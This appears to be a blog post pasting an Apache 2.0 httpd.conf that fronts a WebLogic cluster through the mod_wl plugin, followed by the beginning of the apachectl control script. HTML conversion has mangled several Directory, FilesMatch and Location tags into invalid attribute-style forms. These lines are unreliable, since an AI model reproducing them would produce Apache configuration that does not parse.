OS/2 MPM <br /># StartServers: Number of server processes to maintain <br /># MinSpareThreads: Minimum number of idle threads per process, <br />#                  to handle request spikes <br /># MaxSpareThreads: Maximum number of idle threads per process <br /># MaxRequestsPerChild: Maximum number of connections per server process <br />&lt;ifmodule mpmt_os2.c=""&gt; <br />StartServers           2 <br />MinSpareThreads        5 <br />MaxSpareThreads       10 <br />MaxRequestsPerChild    0 <br />&lt;/ifmodule&gt; <br /> <br /># <br /># Listen: Allows you to bind Apache to specific IP addresses and/or <br /># ports, instead of the default. See also the &lt;virtualhost&gt; <br /># directive. <br /># <br /># Change this to Listen on specific IP addresses as shown below to <br /># prevent Apache from glomming onto all bound IP addresses (0.0.0.0) <br /># <br />#Listen 12.34.56.78:80 <br /> <br />Listen 8081 <br /> <br /># <br /># Dynamic Shared Object (DSO) Support <br /># <br /># To be able to use the functionality of a module which was built as a DSO you <br /># have to place corresponding `LoadModule' lines at this location so the <br /># directives contained in it are actually available _before_ they are used. <br /># Statically compiled modules (those listed by `httpd -l') do not need <br /># to be loaded here. <br /># <br /># Example: <br /># LoadModule foo_module modules/mod_foo.so <br /># <br />LoadModule weblogic_module modules/mod_wl_20.so <br /> <br /># <br /># ExtendedStatus controls whether Apache will generate "full" status <br /># information (ExtendedStatus On) or just basic information (ExtendedStatus <br /># Off) when the "server-status" handler is called. The default is Off. <br /># <br />#ExtendedStatus On <br /> <br />### Section 2: 'Main' server configuration <br /># <br /># The directives in this section set up the values used by the 'main' <br /># server, which responds to any requests that aren't handled by a <br /># &lt;virtualhost&gt; definition.  These values also provide defaults for <br /># any &lt;virtualhost&gt; containers you may define later in the file. <br /># <br /># All of these directives may appear inside &lt;virtualhost&gt; containers, <br /># in which case these default settings will be overridden for the <br /># virtual host being defined. <br /># <br /> <br />&lt;ifmodule !mpm_winnt.c=""&gt; <br />&lt;ifmodule !mpm_netware.c=""&gt; <br /># <br /># If you wish httpd to run as a different user or group, you must run <br /># httpd as root initially and it will switch.  <br /># <br /># User/Group: The name (or #number) of the user/group to run httpd as. <br />#  . On SCO (ODT 3) use "User nouser" and "Group nogroup". <br />#  . On HPUX you may not be able to use shared memory as nobody, and the <br />#    suggested workaround is to create a user www and use that user. <br />#  NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET) <br />#  when the value of (unsigned)Group is above 60000; <br />#  don't use Group #-1 on these systems! <br /># <br />User nobody <br />Group #-1 <br />&lt;/ifmodule&gt; <br />&lt;/ifmodule&gt; <br /> <br /># <br /># ServerAdmin: Your address, where problems with the server should be <br /># e-mailed.  This address appears on some server-generated pages, such <br /># as error documents.  e.g. admin@your-domain.com <br /># <br />ServerAdmin you@example.com <br /> <br /># <br /># ServerName gives the name and port that the server uses to identify itself. <br /># This can often be determined automatically, but we recommend you specify <br /># it explicitly to prevent problems during startup. <br /># <br /># If this is not set to valid DNS name for your host, server-generated <br /># redirections will not work.  See also the UseCanonicalName directive. <br /># <br /># If your host doesn't have a registered DNS name, enter its IP address here. <br /># You will have to access it by its address anyway, and this will make <br /># redirections work in a sensible way. <br /># <br /># ServerName www.example.com:80 <br /> <br /> <br /># <br /># UseCanonicalName: Determines how Apache constructs self-referencing <br /># URLs and the SERVER_NAME and SERVER_PORT variables. <br /># When set "Off", Apache will use the Hostname and Port supplied <br /># by the client.  When set "On", Apache will use the value of the <br /># ServerName directive. <br /># <br />UseCanonicalName Off <br /> <br /># <br /># DocumentRoot: The directory out of which you will serve your <br /># documents. By default, all requests are taken from this directory, but <br /># symbolic links and aliases may be used to point to other locations. <br /># <br />DocumentRoot "/home/weblogic/apache//htdocs" <br /> <br /># <br /># Each directory to which Apache has access can be configured with respect <br /># to which services and features are allowed and/or disabled in that <br /># directory (and its subdirectories). <br /># <br /># First, we configure the "default" to be a very restrictive set of <br /># features.  <br /># <br />&lt;directory&gt; <br />Options FollowSymLinks <br />AllowOverride None <br />&lt;/directory&gt; <br /> <br /># <br /># Note that from this point forward you must specifically allow <br /># particular features to be enabled - so if something's not working as <br /># you might expect, make sure that you have specifically enabled it <br /># below. <br /># <br /> <br /># <br /># This should be changed to whatever you set DocumentRoot to. <br /># <br />&lt;directory "="" home="" weblogic="" apache="" htdocs"=""&gt; <br /> <br /># <br /># Possible values for the Options directive are "None", "All", <br /># or any combination of: <br />#   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews <br /># <br /># Note that "MultiViews" must be named *explicitly* --- "Options All" <br /># doesn't give it to you. <br /># <br /># The Options directive is both complicated and important.  Please see <br /># http://httpd.apache.org/docs/2.0/mod/core.html#options <br /># for more information. <br /># <br />Options Indexes FollowSymLinks <br /> <br /># <br /># AllowOverride controls what directives may be placed in .htaccess files. <br /># It can be "All", "None", or any combination of the keywords: <br />#   Options FileInfo AuthConfig Limit Indexes <br /># <br />AllowOverride None <br /> <br /># <br /># Controls who can get stuff from this server. <br /># <br />Order allow,deny <br />Allow from all <br /> <br />&lt;/directory&gt; <br /> <br /># <br /># UserDir: The name of the directory that is appended onto a user's home <br /># directory if a ~user request is received. <br /># <br />UserDir public_html <br /> <br /># <br /># Control access to UserDir directories.  The following is an example <br /># for a site where these directories are restricted to read-only. <br /># <br />#&lt;directory home="" *="" public_html=""&gt; <br />#    AllowOverride FileInfo AuthConfig Limit Indexes <br />#    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec <br />#    &lt;limit get="" post="" options="" propfind=""&gt; <br />#        Order allow,deny <br />#        Allow from all <br />#    &lt;/limit&gt; <br />#    &lt;limitexcept get="" post="" options="" propfind=""&gt; <br />#        Order deny,allow <br />#        Deny from all <br />#    &lt;/limitexcept&gt; <br />#&lt;/directory&gt; <br /> <br /># <br /># DirectoryIndex: sets the file that Apache will serve if a directory <br /># is requested. <br /># <br /># The index.html.var file (a type-map) is used to deliver content- <br /># negotiated documents.  The MultiViews Option can be used for the <br /># same purpose, but it is much slower. <br /># <br />DirectoryIndex index.html index.html.var <br /> <br /># <br /># AccessFileName: The name of the file to look for in each directory <br /># for additional configuration directives.  See also the AllowOverride <br /># directive. <br /># <br />AccessFileName .htaccess <br /> <br /># <br /># The following lines prevent .htaccess and .htpasswd files from being <br /># viewed by Web clients. <br /># <br />&lt;filesmatch "^\.ht"=""&gt; <br />Order allow,deny <br />Deny from all <br />&lt;/filesmatch&gt; <br /> <br /># <br /># TypesConfig describes where the mime.types file (or equivalent) is <br /># to be found. <br /># <br />TypesConfig conf/mime.types <br /> <br /># <br /># DefaultType is the default MIME type the server will use for a document <br /># if it cannot otherwise determine one, such as from filename extensions. <br /># If your server contains mostly text or HTML documents, "text/plain" is <br /># a good value.  If most of your content is binary, such as applications <br /># or images, you may want to use "application/octet-stream" instead to <br /># keep browsers from trying to display binary files as though they are <br /># text. <br /># <br />DefaultType text/plain <br /> <br /># <br /># The mod_mime_magic module allows the server to use various hints from the <br /># contents of the file itself to determine its type.  The MIMEMagicFile <br /># directive tells the module where the hint definitions are located. <br /># <br />&lt;ifmodule mod_mime_magic.c=""&gt; <br />MIMEMagicFile conf/magic <br />&lt;/ifmodule&gt; <br /> <br /># <br /># HostnameLookups: Log the names of clients or just their IP addresses <br /># e.g., www.apache.org (on) or 204.62.129.132 (off). <br /># The default is off because it'd be overall better for the net if people <br /># had to knowingly turn this feature on, since enabling it means that <br /># each client request will result in AT LEAST one lookup request to the <br /># nameserver. <br /># <br />HostnameLookups Off <br /> <br /># <br /># EnableMMAP: Control whether memory-mapping is used to deliver <br /># files (assuming that the underlying OS supports it). <br /># The default is on; turn this off if you serve from NFS-mounted <br /># filesystems.  On some systems, turning it off (regardless of <br /># filesystem) can improve performance; for details, please see <br /># http://httpd.apache.org/docs/2.0/mod/core.html#enablemmap <br /># <br />#EnableMMAP off <br /> <br /># <br /># EnableSendfile: Control whether the sendfile kernel support is <br /># used  to deliver files (assuming that the OS supports it). <br /># The default is on; turn this off if you serve from NFS-mounted <br /># filesystems.  Please see <br /># http://httpd.apache.org/docs/2.0/mod/core.html#enablesendfile <br /># <br />#EnableSendfile off <br /> <br /># <br /># ErrorLog: The location of the error log file. <br /># If you do not specify an ErrorLog directive within a &lt;virtualhost&gt; <br /># container, error messages relating to that virtual host will be <br /># logged here.  If you *do* define an error logfile for a &lt;virtualhost&gt; <br /># container, that host's errors will be logged there and not here. <br /># <br />ErrorLog logs/error_log <br /> <br /># <br /># LogLevel: Control the number of messages logged to the error_log. <br /># Possible values include: debug, info, notice, warn, error, crit, <br /># alert, emerg. <br /># <br />LogLevel warn <br /> <br /># <br /># The following directives define some format nicknames for use with <br /># a CustomLog directive (see below). <br /># <br />LogFormat "%h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined <br />LogFormat "%h %l %u %t \"%r\" %&gt;s %b" common <br />LogFormat "%{Referer}i -&gt; %U" referer <br />LogFormat "%{User-agent}i" agent <br /> <br /># You need to enable mod_logio.c to use %I and %O <br />#LogFormat "%h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio <br /> <br /># <br /># The location and format of the access logfile (Common Logfile Format). <br /># If you do not define any access logfiles within a &lt;virtualhost&gt; <br /># container, they will be logged here.  Contrariwise, if you *do* <br /># define per-&lt;virtualhost&gt; access logfiles, transactions will be <br /># logged therein and *not* in this file. <br /># <br />CustomLog logs/access_log common <br /> <br /># <br /># If you would like to have agent and referer logfiles, uncomment the <br /># following directives. <br /># <br />#CustomLog logs/referer_log referer <br />#CustomLog logs/agent_log agent <br /> <br /># <br /># If you prefer a single logfile with access, agent, and referer information <br /># (Combined Logfile Format) you can use the following directive. <br /># <br />#CustomLog logs/access_log combined <br /> <br /># <br /># ServerTokens <br /># This directive configures what you return as the Server HTTP response <br /># Header. The default is 'Full' which sends information about the OS-Type <br /># and compiled in modules. <br /># Set to one of:  Full | OS | Minor | Minimal | Major | Prod <br /># where Full conveys the most information, and Prod the least. <br /># <br />ServerTokens Full <br /> <br /># <br /># Optionally add a line containing the server version and virtual host <br /># name to server-generated pages (internal error documents, FTP directory <br /># listings, mod_status and mod_info output etc., but not CGI generated <br /># documents or custom error documents). <br /># Set to "EMail" to also include a mailto: link to the ServerAdmin. <br /># Set to one of:  On | Off | EMail <br /># <br />ServerSignature On <br /> <br /># <br /># Aliases: Add here as many aliases as you need (with no limit). The format is <br /># Alias fakename realname <br /># <br /># Note that if you include a trailing / on fakename then the server will <br /># require it to be present in the URL.  So "/icons" isn't aliased in this <br /># example, only "/icons/".  If the fakename is slash-terminated, then the <br /># realname must also be slash terminated, and if the fakename omits the <br /># trailing slash, the realname must also omit it. <br /># <br /># We include the /icons/ alias for FancyIndexed directory listings.  If you <br /># do not use FancyIndexing, you may comment this out. <br /># <br />Alias /icons/ "/home/weblogic/apache//icons/" <br /> <br />&lt;directory "="" home="" weblogic="" apache="" icons"=""&gt; <br />Options Indexes MultiViews <br />AllowOverride None <br />Order allow,deny <br />Allow from all <br />&lt;/directory&gt; <br /> <br /># <br /># This should be changed to the ServerRoot/manual/.  The alias provides <br /># the manual, even if you choose to move your DocumentRoot.  You may comment <br /># this out if you do not care for the documentation. <br /># <br />AliasMatch ^/manual(?:/(?:de|en|es|fr|ja|ko|ru))?(/.*)?$ "/home/weblogic/apache//manual$1" <br /> <br />&lt;directory "="" home="" weblogic="" apache="" manual"=""&gt; <br />Options Indexes <br />AllowOverride None <br />Order allow,deny <br />Allow from all <br /> <br />&lt;files *.html=""&gt; <br />SetHandler type-map <br />&lt;/files&gt; <br /> <br />SetEnvIf Request_URI ^/manual/(de|en|es|fr|ja|ko|ru)/ prefer-language=$1 <br />RedirectMatch 301 ^/manual(?:/(de|en|es|fr|ja|ko|ru)){2,}(/.*)?$ /manual/$1$2 <br />&lt;/directory&gt; <br /> <br /># <br /># ScriptAlias: This controls which directories contain server scripts. <br /># ScriptAliases are essentially the same as Aliases, except that <br /># documents in the realname directory are treated as applications and <br /># run by the server when requested rather than as documents sent to the client. <br /># The same rules about trailing "/" apply to ScriptAlias directives as to <br /># Alias. <br /># <br />ScriptAlias /cgi-bin/ "/home/weblogic/apache//cgi-bin/" <br /> <br />&lt;ifmodule mod_cgid.c=""&gt; <br /># <br /># Additional to mod_cgid.c settings, mod_cgid has Scriptsock &lt;path&gt; <br /># for setting UNIX socket for communicating with cgid. <br /># <br />#Scriptsock            logs/cgisock <br />&lt;/ifmodule&gt; <br /> <br /># <br /># "/home/weblogic/apache//cgi-bin" should be changed to whatever your ScriptAliased <br /># CGI directory exists, if you have that configured. <br /># <br />&lt;directory "="" home="" weblogic="" apache="" cgi-bin"=""&gt; <br />AllowOverride None <br />Options None <br />Order allow,deny <br />Allow from all <br />&lt;/directory&gt; <br /> <br /># <br /># Redirect allows you to tell clients about documents which used to exist in <br /># your server's namespace, but do not anymore. This allows you to tell the <br /># clients where to look for the relocated document. <br /># Example: <br /># Redirect permanent /foo http://www.example.com/bar <br /> <br /># <br /># Directives controlling the display of server-generated directory listings. <br /># <br /> <br /># <br /># IndexOptions: Controls the appearance of server-generated directory <br /># listings. <br /># <br />IndexOptions FancyIndexing VersionSort <br /> <br /># <br /># AddIcon* directives tell the server which icon to show for different <br /># files or filename extensions.  These are only displayed for <br /># FancyIndexed directories. <br /># <br />AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip <br /> <br />AddIconByType (TXT,/icons/text.gif) text/* <br />AddIconByType (IMG,/icons/image2.gif) image/* <br />AddIconByType (SND,/icons/sound2.gif) audio/* <br />AddIconByType (VID,/icons/movie.gif) video/* <br /> <br />AddIcon /icons/binary.gif .bin .exe <br />AddIcon /icons/binhex.gif .hqx <br />AddIcon /icons/tar.gif .tar <br />AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv <br />AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip <br />AddIcon /icons/a.gif .ps .ai .eps <br />AddIcon /icons/layout.gif .html .shtml .htm .pdf <br />AddIcon /icons/text.gif .txt <br />AddIcon /icons/c.gif .c <br />AddIcon /icons/p.gif .pl .py <br />AddIcon /icons/f.gif .for <br />AddIcon /icons/dvi.gif .dvi <br />AddIcon /icons/uuencoded.gif .uu <br />AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl <br />AddIcon /icons/tex.gif .tex <br />AddIcon /icons/bomb.gif core <br /> <br />AddIcon /icons/back.gif .. <br />AddIcon /icons/hand.right.gif README <br />AddIcon /icons/folder.gif ^^DIRECTORY^^ <br />AddIcon /icons/blank.gif ^^BLANKICON^^ <br /> <br /># <br /># DefaultIcon is which icon to show for files which do not have an icon <br /># explicitly set. <br /># <br />DefaultIcon /icons/unknown.gif <br /> <br /># <br /># AddDescription allows you to place a short description after a file in <br /># server-generated indexes.  These are only displayed for FancyIndexed <br /># directories. <br /># Format: AddDescription "description" filename <br /># <br />#AddDescription "GZIP compressed document" .gz <br />#AddDescription "tar archive" .tar <br />#AddDescription "GZIP compressed tar archive" .tgz <br /> <br /># <br /># ReadmeName is the name of the README file the server will look for by <br /># default, and append to directory listings. <br /># <br /># HeaderName is the name of a file which should be prepended to <br /># directory indexes. <br />ReadmeName README.html <br />HeaderName HEADER.html <br /> <br /># <br /># IndexIgnore is a set of filenames which directory indexing should ignore <br /># and not include in the listing.  Shell-style wildcarding is permitted. <br /># <br />IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t <br /> <br /># <br /># DefaultLanguage and AddLanguage allows you to specify the language of <br /># a document. You can then use content negotiation to give a browser a <br /># file in a language the user can understand. <br /># <br /># Specify a default language. This means that all data <br /># going out without a specific language tag (see below) will <br /># be marked with this one. You probably do NOT want to set <br /># this unless you are sure it is correct for all cases. <br /># <br /># * It is generally better to not mark a page as <br /># * being a certain language than marking it with the wrong <br /># * language! <br /># <br /># DefaultLanguage nl <br /># <br /># Note 1: The suffix does not have to be the same as the language <br /># keyword --- those with documents in Polish (whose net-standard <br /># language code is pl) may wish to use "AddLanguage pl .po" to <br /># avoid the ambiguity with the common suffix for perl scripts. <br /># <br /># Note 2: The example entries below illustrate that in some cases <br /># the two character 'Language' abbreviation is not identical to <br /># the two character 'Country' code for its country, <br /># E.g. 'Danmark/dk' versus 'Danish/da'. <br /># <br /># Note 3: In the case of 'ltz' we violate the RFC by using a three char <br /># specifier. There is 'work in progress' to fix this and get <br /># the reference data for rfc1766 cleaned up. <br /># <br /># Catalan (ca) - Croatian (hr) - Czech (cs) - Danish (da) - Dutch (nl) <br /># English (en) - Esperanto (eo) - Estonian (et) - French (fr) - German (de) <br /># Greek-Modern (el) - Hebrew (he) - Italian (it) - Japanese (ja) <br /># Korean (ko) - Luxembourgeois* (ltz) - Norwegian Nynorsk (nn) <br /># Norwegian (no) - Polish (pl) - Portugese (pt) <br /># Brazilian Portuguese (pt-BR) - Russian (ru) - Swedish (sv) <br /># Simplified Chinese (zh-CN) - Spanish (es) - Traditional Chinese (zh-TW) <br /># <br />AddLanguage ca .ca <br />AddLanguage cs .cz .cs <br />AddLanguage da .dk <br />AddLanguage de .de <br />AddLanguage el .el <br />AddLanguage en .en <br />AddLanguage eo .eo <br />AddLanguage es .es <br />AddLanguage et .et <br />AddLanguage fr .fr <br />AddLanguage he .he <br />AddLanguage hr .hr <br />AddLanguage it .it <br />AddLanguage ja .ja <br />AddLanguage ko .ko <br />AddLanguage ltz .ltz <br />AddLanguage nl .nl <br />AddLanguage nn .nn <br />AddLanguage no .no <br />AddLanguage pl .po <br />AddLanguage pt .pt <br />AddLanguage pt-BR .pt-br <br />AddLanguage ru .ru <br />AddLanguage sv .sv <br />AddLanguage zh-CN .zh-cn <br />AddLanguage zh-TW .zh-tw <br /> <br /># <br /># LanguagePriority allows you to give precedence to some languages <br /># in case of a tie during content negotiation. <br /># <br /># Just list the languages in decreasing order of preference. We have <br /># more or less alphabetized them here. You probably want to change this. <br /># <br />LanguagePriority en ca cs da de el eo es et fr he hr it ja ko ltz nl nn no pl pt pt-BR ru sv zh-CN zh-TW <br /> <br /># <br /># ForceLanguagePriority allows you to serve a result page rather than <br /># MULTIPLE CHOICES (Prefer) [in case of a tie] or NOT ACCEPTABLE (Fallback) <br /># [in case no accepted languages matched the available variants] <br /># <br />ForceLanguagePriority Prefer Fallback <br /> <br /># <br /># Commonly used filename extensions to character sets. You probably <br /># want to avoid clashes with the language extensions, unless you <br /># are good at carefully testing your setup after each change. <br /># See http://www.iana.org/assignments/character-sets for the <br /># official list of charset names and their respective RFCs. <br /># <br />AddCharset ISO-8859-1  .iso8859-1  .latin1 <br />AddCharset ISO-8859-2  .iso8859-2  .latin2 .cen <br />AddCharset ISO-8859-3  .iso8859-3  .latin3 <br />AddCharset ISO-8859-4  .iso8859-4  .latin4 <br />AddCharset ISO-8859-5  .iso8859-5  .latin5 .cyr .iso-ru <br />AddCharset ISO-8859-6  .iso8859-6  .latin6 .arb <br />AddCharset ISO-8859-7  .iso8859-7  .latin7 .grk <br />AddCharset ISO-8859-8  .iso8859-8  .latin8 .heb <br />AddCharset ISO-8859-9  .iso8859-9  .latin9 .trk <br />AddCharset ISO-2022-JP .iso2022-jp .jis <br />AddCharset ISO-2022-KR .iso2022-kr .kis <br />AddCharset ISO-2022-CN .iso2022-cn .cis <br />AddCharset Big5        .Big5       .big5 <br /># For russian, more than one charset is used (depends on client, mostly): <br />AddCharset WINDOWS-1251 .cp-1251   .win-1251 <br />AddCharset CP866       .cp866 <br />AddCharset KOI8-r      .koi8-r .koi8-ru <br />AddCharset KOI8-ru     .koi8-uk .ua <br />AddCharset ISO-10646-UCS-2 .ucs2 <br />AddCharset ISO-10646-UCS-4 .ucs4 <br />AddCharset UTF-8       .utf8 <br /> <br /># The set below does not map to a specific (iso) standard <br /># but works on a fairly wide range of browsers. Note that <br /># capitalization actually matters (it should not, but it <br /># does for some browsers). <br /># <br /># See http://www.iana.org/assignments/character-sets <br /># for a list of sorts. But browsers support few. <br /># <br />AddCharset GB2312      .gb2312 .gb <br />AddCharset utf-7       .utf7 <br />AddCharset utf-8       .utf8 <br />AddCharset big5        .big5 .b5 <br />AddCharset EUC-TW      .euc-tw <br />AddCharset EUC-JP      .euc-jp <br />AddCharset EUC-KR      .euc-kr <br />AddCharset shift_jis   .sjis <br /> <br /># <br /># AddType allows you to add to or override the MIME configuration <br /># file mime.types for specific file types. <br /># <br />#AddType application/x-tar .tgz <br /># <br /># AddEncoding allows you to have certain browsers uncompress <br /># information on the fly. Note: Not all browsers support this. <br /># Despite the name similarity, the following Add* directives have nothing <br /># to do with the FancyIndexing customization directives above. <br /># <br />#AddEncoding x-compress .Z <br />#AddEncoding x-gzip .gz .tgz <br /># <br /># If the AddEncoding directives above are commented-out, then you <br /># probably should define those extensions to indicate media types: <br /># <br />AddType application/x-compress .Z <br />AddType application/x-gzip .gz .tgz <br /> <br /># <br /># AddHandler allows you to map certain file extensions to "handlers": <br /># actions unrelated to filetype. These can be either built into the server <br /># or added with the Action directive (see below) <br /># <br /># To use CGI scripts outside of ScriptAliased directories: <br /># (You will also need to add "ExecCGI" to the "Options" directive.) <br /># <br />#AddHandler cgi-script .cgi <br /> <br /># <br /># For files that include their own HTTP headers: <br /># <br />#AddHandler send-as-is asis <br /> <br /># <br /># For server-parsed imagemap files: <br /># <br />#AddHandler imap-file map <br /> <br /># <br /># For type maps (negotiated resources): <br /># (This is enabled by default to allow the Apache "It Worked" page <br />#  to be distributed in multiple languages.) <br /># <br />AddHandler type-map var <br /> <br /># <br /># Filters allow you to process content before it is sent to the client. <br /># <br /># To parse .shtml files for server-side includes (SSI): <br /># (You will also need to add "Includes" to the "Options" directive.) <br /># <br />#AddType text/html .shtml <br />#AddOutputFilter INCLUDES .shtml <br /> <br /># <br /># Action lets you define media types that will execute a script whenever <br /># a matching file is called. This eliminates the need for repeated URL <br /># pathnames for oft-used CGI file processors. <br /># Format: Action media/type /cgi-script/location <br /># Format: Action handler-name /cgi-script/location <br /># <br /> <br /># <br /># Customizable error responses come in three flavors: <br /># 1) plain text 2) local redirects 3) external redirects <br /># <br /># Some examples: <br />#ErrorDocument 500 "The server made a boo boo." <br />#ErrorDocument 404 /missing.html <br />#ErrorDocument 404 "/cgi-bin/missing_handler.pl" <br />#ErrorDocument 402 http://www.example.com/subscription_info.html <br /># <br /> <br /># <br /># Putting this all together, we can internationalize error responses. <br /># <br /># We use Alias to redirect any /error/HTTP_&lt;error&gt;.html.var response to <br /># our collection of by-error message multi-language collections.  We use <br /># includes to substitute the appropriate text. <br /># <br /># You can modify the messages' appearance without changing any of the <br /># default HTTP_&lt;error&gt;.html.var files by adding the line: <br /># <br />#   Alias /error/include/ "/your/include/path/" <br /># <br /># which allows you to create your own set of files by starting with the <br /># /home/weblogic/apache//error/include/ files and copying them to /your/include/path/, <br /># even on a per-VirtualHost basis.  The default include files will display <br /># your Apache version number and your ServerAdmin email address regardless <br /># of the setting of ServerSignature. <br /># <br /># The internationalized error documents require mod_alias, mod_include <br /># and mod_negotiation.  To activate them, uncomment the following 30 lines. <br /> <br />#    Alias /error/ "/home/weblogic/apache//error/" <br /># <br />#    &lt;directory "="" home="" weblogic="" apache="" error"=""&gt; <br />#        AllowOverride None <br />#        Options IncludesNoExec <br />#        AddOutputFilter Includes html <br />#        AddHandler type-map var <br />#        Order allow,deny <br />#        Allow from all <br />#        LanguagePriority en cs de es fr it ja ko nl pl pt-br ro sv tr <br />#        ForceLanguagePriority Prefer Fallback <br />#    &lt;/directory&gt; <br /># <br />#    ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var <br />#    ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var <br />#    ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var <br />#    ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var <br />#    ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var <br />#    ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var <br />#    ErrorDocument 410 /error/HTTP_GONE.html.var <br />#    ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var <br />#    ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var <br />#    ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var <br />#    ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var <br />#    ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var <br />#    ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var <br />#    ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var <br />#    ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var <br />#    ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var <br />#    ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var <br /> <br /> <br /># <br /># The following directives modify normal HTTP response behavior to <br /># handle known problems with browser implementations. <br /># <br />BrowserMatch "Mozilla/2" nokeepalive <br />BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 <br />BrowserMatch "RealPlayer 4\.0" force-response-1.0 <br />BrowserMatch "Java/1\.0" force-response-1.0 <br />BrowserMatch "JDK/1\.0" force-response-1.0 <br /> <br /># <br /># The following directive disables redirects on non-GET requests for <br /># a directory that does not include the trailing slash.  This fixes a <br /># problem with Microsoft WebFolders which does not appropriately handle <br /># redirects for folders with DAV methods. <br /># Same deal with Apple's DAV filesystem and Gnome VFS support for DAV. <br /># <br />BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully <br />BrowserMatch "MS FrontPage" redirect-carefully <br />BrowserMatch "^WebDrive" redirect-carefully <br />BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully <br />BrowserMatch "^gnome-vfs" redirect-carefully <br />BrowserMatch "^XML Spy" redirect-carefully <br />BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully <br /> <br /># <br /># Allow server status reports generated by mod_status, <br /># with the URL of http://servername/server-status <br /># Change the ".example.com" to match your domain to enable. <br /># <br />#&lt;location server-status=""&gt; <br />#    SetHandler server-status <br />#    Order deny,allow <br />#    Deny from all <br />#    Allow from .example.com <br />#&lt;/location&gt; <br /> <br /># <br /># Allow remote server configuration reports, with the URL of <br />#  http://servername/server-info (requires that mod_info.c be loaded). <br /># Change the ".example.com" to match your domain to enable. <br /># <br />#&lt;location server-info=""&gt; <br />#    SetHandler server-info <br />#    Order deny,allow <br />#    Deny from all <br />#    Allow from .example.com <br />#&lt;/location&gt; <br /> <br /> <br /># <br /># Bring in additional module-specific configurations <br /># <br />&lt;ifmodule mod_ssl.c=""&gt; <br />Include conf/ssl.conf <br />&lt;/ifmodule&gt; <br /> <br /> <br />### Section 3: Virtual Hosts <br /># <br /># VirtualHost: If you want to maintain multiple domains/hostnames on your <br /># machine you can setup VirtualHost containers for them. Most configurations <br /># use only name-based virtual hosts so the server doesn't need to worry about <br /># IP addresses. This is indicated by the asterisks in the directives below. <br /># <br /># Please see the documentation at <br /># &lt;url:http: httpd.apache.org="" docs="" 2.0="" vhosts=""/&gt; <br /># for further details before you try to setup virtual hosts. <br /># <br /># You may use the command line option '-S' to verify your virtual host <br /># configuration. <br /> <br /># <br /># Use name-based virtual hosting. <br /># <br />#NameVirtualHost *:80 <br /> <br /># <br /># VirtualHost example: <br /># Almost any Apache directive may go into a VirtualHost container. <br /># The first VirtualHost section is used for requests without a known <br /># server name. <br /># <br />#&lt;virtualhost *:80=""&gt; <br />#    ServerAdmin webmaster@dummy-host.example.com <br />#    DocumentRoot /www/docs/dummy-host.example.com <br />#    ServerName dummy-host.example.com <br />#    ErrorLog logs/dummy-host.example.com-error_log <br />#    CustomLog logs/dummy-host.example.com-access_log common <br />#&lt;/virtualhost&gt; <br /> <br />#&lt;location insiis=""&gt; <br />#  SetHandler weblogic-handler <br />#&lt;/location&gt;  <br /> <br />&lt;ifmodule mod_weblogic.c=""&gt; <br />  WebLogicCluster 192.168.108.12:8091,192.168.108.13:8092 <br />  MatchExpression * <br />&lt;/ifmodule&gt; <br />------------------------------ <br />apachectl 内容如下 <br />------------------------------ <br />#!/bin/sh <br /># <br /># Licensed to the Apache Software Foundation (ASF) under one or more <br /># contributor license agreements.  See the NOTICE file distributed with <br /># this work for additional information regarding copyright ownership. <br /># The ASF licenses this file to You under the Apache License, Version 2.0 <br /># (the "License"); you may not use this file except in compliance with <br /># the License.  You may obtain a copy of the License at <br /># <br />#     http://www.apache.org/licenses/LICENSE-2.0 <br /># <br /># Unless required by applicable law or agreed to in writing, software <br /># distributed under the License is distributed on an "AS IS" BASIS, <br /># WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. <br /># See the License for the specific language governing permissions and <br /># limitations under the License. <br /># <br /># <br /># Apache control script designed to allow an easy command line interface <br /># to controlling Apache.  Written by Marc Slemko, 1997/08/23 <br /># <br /># The exit codes returned are: <br />#   XXX this doc is no longer correct now that the interesting <br />#   XXX functions are handled by httpd <br /># 0 - operation completed successfully <br /># 1 - <br /># 2 - usage error <br /># 3 - httpd could not be started <br /># 4 - httpd could not be stopped <br /># 5 - httpd could not be started during a restart <br /># 6 - httpd could not be restarted during a restart <br /># 7 - httpd could not be restarted during a graceful restart <br /># 8 - configuration syntax error <br /># <br /># When multiple arguments are given, only the error from the _last_ <br /># one is reported.  Run "apachectl help" for usage info <br /># <br />ARGV="$@" <br /># <br /># |||||||||||||||||||| START CONFIGURATION SECTION  |||||||||||||||||||| <br /># --------------------                              -------------------- <br /># <br /># the path to your httpd binary, including options if necessary <br />HTTPD='/home/weblogic/apache//bin/httpd' <br /># <br /># pick up any necessary environment variables <br />if test -f /home/weblogic/apache//bin/envvars; then <br />  . /home/weblogic/apache//bin/envvars <br />fi <br 